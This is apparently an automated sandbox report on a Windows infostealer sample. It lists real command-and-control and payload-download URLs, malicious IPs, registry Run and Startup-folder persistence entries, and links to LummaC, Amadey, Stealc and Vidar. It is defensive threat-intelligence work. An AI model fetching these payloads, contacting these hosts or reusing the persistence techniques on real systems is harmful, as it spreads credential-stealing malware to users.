https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.2675026709.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/mine/random.exeS	file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/luma/random.exe	skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php)N	skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://go.micros	06d4af6f50.exe, 0000001E.00000002.3904549769.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpQ	skotes.exe, 00000016.00000003.3926107779.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://frogmen-smell.sbs/or	06d4af6f50.exe, 0000001E.00000003.3676183261.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3660448469.0000000001822000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3699189425.0000000001825000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3661326025.0000000001822000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://frogmen-smell.sbs/apiO	06d4af6f50.exe, 00000021.00000003.3881198326.00000000019B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpB;	file.exe, 00000000.00000002.2675026709.0000000001583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://frogmen-smell.sbs/apiJ	06d4af6f50.exe, 0000001E.00000003.3592012775.0000000001806000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpncodedj	skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/68b591d6548ec281/softokn3.dllp	file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.php;	skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crl.micro(	06d4af6f50.exe, 0000001A.00000003.3430761096.0000000000683000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.2675026709.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000018.00000002.3439711369.00000287D1832000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogmen-smell.sbs/D	06d4af6f50.exe, 0000001E.00000003.3677069569.0000000001833000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3660696851.0000000001833000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3661291599.0000000001830000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3627889358.000000000182F000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3698525011.0000000001833000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3698747806.0000000001833000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://frogmen-smell.sbs/G	06d4af6f50.exe, 00000021.00000003.3848870098.00000000019AE000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3845762121.00000000019B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://oneget.orgX	powershell.exe, 00000018.00000002.3414689340.00000287C2E77000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogmen-smell.sbs/apiW1	06d4af6f50.exe, 0000001A.00000003.3491330555.00000000006E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://frogmen-smell.sbs/apia	06d4af6f50.exe, 00000021.00000003.3825982133.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3826632372.00000000019BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.107.246.45	s-part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
87.120.125.254	unknown	Bulgaria	25206	UNACS-AS-BG8000BurgasBG	false
52.178.17.2	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.67.174.133	frogmen-smell.sbs	United States	13335	CLOUDFLARENETUS	false
23.222.241.152	unknown	United States	20940	AKAMAI-ASN1EU	false
20.125.209.212	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
18.65.39.56	sb.scorecardresearch.com	United States	3	MIT-GATEWAYSUS	false
23.38.189.114	unknown	United States	16625	AKAMAI-ASUS	false
23.222.241.144	unknown	United States	20940	AKAMAI-ASN1EU	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
23.47.51.183	unknown	United States	16625	AKAMAI-ASUS	false
216.58.206.46	plus.l.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.196	unknown	United States	15169	GOOGLEUS	false
20.96.153.111	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.208.16.88	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.222.241.134	unknown	United States	20940	AKAMAI-ASN1EU	false
152.195.19.97	unknown	United States	15133	EDGECASTUS	false
142.250.181.238	play.google.com	United States	15169	GOOGLEUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
13.107.246.57	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
87.120.125.16	unknown	Bulgaria	25206	UNACS-AS-BG8000BurgasBG	false
23.218.232.139	unknown	United States	24835	RAYA-ASEG	false
3.168.2.67	unknown	United States	16509	AMAZON-02US	false
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
2.23.209.175	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
142.250.185.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
2.23.209.176	unknown	European Union	1273	CWVodafoneGroupPLCEU	false

Private

IP
192.168.2.7
192.168.2.4
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1555405
Start date and time:	2024-11-13 20:38:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 17m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	67
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@153/383@49/37
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 93.184.221.240, 142.250.184.195, 142.250.185.78, 66.102.1.84, 34.104.35.123, 142.250.186.35, 142.250.185.106, 142.250.74.202, 142.250.185.138, 142.250.185.170, 142.250.186.138, 142.250.186.106, 172.217.18.10, 142.250.185.74, 142.250.186.74, 172.217.18.106, 142.250.184.202, 142.250.181.234, 142.250.186.42, 142.250.185.202, 172.217.16.202, 142.250.185.234, 142.250.184.234, 216.58.206.42, 172.217.23.106, 142.250.186.170, 216.58.206.74, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.185.206, 13.107.6.158, 2.19.126.145, 2.19.126.152, 172.205.80.42, 88.221.110.195, 88.221.110.179, 2.23.209.171, 2.23.209.161, 2.23.209.150, 2.23.209.136, 2.23.209.166, 2.23.209.168, 2.23.209.158, 2.23.209.160, 2.23.209.141, 13.74.129.1, 13.107.21.237, 204.79.197.237, 23.38.98.83, 23.38.98.77, 23.38.98.82, 23.38.98.78, 23.38.98.86, 23.38.98.84, 23.38.98.74, 23.38.98.76, 23.38.98.73, 2.19.126.151, 2.19.126.157, 172.217.16.195, 184.28.89.167, 172.217.18.110,
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, e11290.dspg.akamaiedge.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, update.googleapis.com, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, prod-agic-ne-8.northeurope.cloudapp.azure.com, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, wildcardtlu-ssl.azureedge.net, edgedl.me.gvt1.com, c.bing.com, edgeassetservice.azureedge.net, clients.
Execution Graph export aborted for target file.exe, PID 2232 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:39:46	API Interceptor	120x Sleep call for process: file.exe modified
14:41:01	API Interceptor	15807152x Sleep call for process: skotes.exe modified
14:41:13	API Interceptor	9x Sleep call for process: mk.exe modified
14:41:19	API Interceptor	48x Sleep call for process: powershell.exe modified
14:41:21	API Interceptor	60x Sleep call for process: 06d4af6f50.exe modified
20:40:07	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
20:41:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 06d4af6f50.exe C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe
20:41:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run deb333ea90.exe C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe
20:41:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 06d4af6f50.exe C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe
20:41:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run deb333ea90.exe C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe
20:41:55	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ea44ea94c2.exe C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe
20:42:03	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk
20:42:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ea44ea94c2.exe C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe
20:42:25	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yiuq.lnk
20:42:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zzvy.lnk
20:42:51	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dslm.lnk
20:43:05	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tytb.lnk
20:43:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\akdz.lnk
20:43:31	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kncs.lnk
20:43:44	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\syie.lnk
20:43:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsap.lnk
20:44:41	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mbpx.lnk
20:45:24	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ewjt.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
13.107.246.45	https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4	Get hash	malicious	HTMLPhisher	Browse	nam.dcv.ms/BxPVLH2cz4
87.120.125.254	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	87.120.125.254/img/pidgeon.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sb.scorecardresearch.com	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse	18.244.18.122
	https://pthn.airrcofvbc.com/YReXjN/#<EMAIL&gt	Get hash	malicious	Unknown	Browse	18.244.18.32
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.122
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.245.60.72
	https://www.canva.com/design/DAGOCNo1NUI/fm7sxEzJIeZ3v2miLpNZCw/view?utm_content=DAGOCNo1NUI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	18.245.60.72
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.65.39.56
	Xeno Executor Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	18.244.18.122
	Xeno Executor Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	18.244.18.27
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.245.60.72
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.245.60.72
chrome.cloudflare-dns.com	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	aba5298f.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	x.bat	Get hash	malicious	Unknown	Browse	162.159.61.3
	Xeno Executor Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Xeno Executor Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	aba5298f.msi	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	Xeno Executor Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
frogmen-smell.sbs	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	Updatev4_5.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse	20.151.152.98
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse	23.101.168.44
	https://pthn.airrcofvbc.com/YReXjN/#<EMAIL&gt	Get hash	malicious	Unknown	Browse	13.107.246.44
	Play_VM-Now(Jwright)CQDM.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#<EMAIL>	Get hash	malicious	Unknown	Browse	52.123.129.14
	https://wumgud2ljf.benenulacs.shop/?email=YW1hcmlvbkBndWdnZW5oZWltLm9yZw==	Get hash	malicious	EvilProxy	Browse	13.107.246.60
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	20.189.173.25
	https://l.e.expansion.com/rts/go2.aspx?h=1472587&tp=i-1NGB-A5-b00-1YXgaC-6v-X6KL-1c-1D5I0b-lAXcqWepVc-1yosex&pi=X3ChywZXQmNE8VeceGHlfotAef21gDzbhSQg1vZMQMU&x=%64%79%6E%61%6D%69%63%69%74%64%65%76%69%63%65%73%2E%63%6F%6D%2F%6A%6F%69%6B%64%6A%6D%65%75%65%2FFUDMSvpcJrwI1XV/YW5kcmV3Lm1hbnRlY29uQGZpcnN0b250YXJpby5jb20=	Get hash	malicious	HTMLPhisher	Browse	52.123.129.14
MICROSOFT-CORP-MSN-AS-BLOCKUS	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse	20.151.152.98
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse	23.101.168.44
	https://pthn.airrcofvbc.com/YReXjN/#<EMAIL&gt	Get hash	malicious	Unknown	Browse	13.107.246.44
	Play_VM-Now(Jwright)CQDM.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#<EMAIL>	Get hash	malicious	Unknown	Browse	52.123.129.14
	https://wumgud2ljf.benenulacs.shop/?email=YW1hcmlvbkBndWdnZW5oZWltLm9yZw==	Get hash	malicious	EvilProxy	Browse	13.107.246.60
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	20.189.173.25
	https://l.e.expansion.com/rts/go2.aspx?h=1472587&tp=i-1NGB-A5-b00-1YXgaC-6v-X6KL-1c-1D5I0b-lAXcqWepVc-1yosex&pi=X3ChywZXQmNE8VeceGHlfotAef21gDzbhSQg1vZMQMU&x=%64%79%6E%61%6D%69%63%69%74%64%65%76%69%63%65%73%2E%63%6F%6D%2F%6A%6F%69%6B%64%6A%6D%65%75%65%2FFUDMSvpcJrwI1XV/YW5kcmV3Lm1hbnRlY29uQGZpcnN0b250YXJpby5jb20=	Get hash	malicious	HTMLPhisher	Browse	52.123.129.14
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
UNACS-AS-BG8000BurgasBG	file.exe	Get hash	malicious	Unknown	Browse	87.120.125.16
	file.exe	Get hash	malicious	Unknown	Browse	87.120.125.16
	file.exe	Get hash	malicious	Unknown	Browse	87.120.125.16
	file.exe	Get hash	malicious	Unknown	Browse	87.120.125.16
	View Pdf Doc_1c854e0875fca437af9ba7046d2f6712.htm	Get hash	malicious	Unknown	Browse	87.120.115.220
	dyT8pWNPk7.exe	Get hash	malicious	Remcos	Browse	87.120.125.229
	View Pdf Doc_8a3c334133bfb9605fc344b2f764ac62.htm	Get hash	malicious	Unknown	Browse	87.120.115.220
	file.exe	Get hash	malicious	XWorm	Browse	87.120.120.26
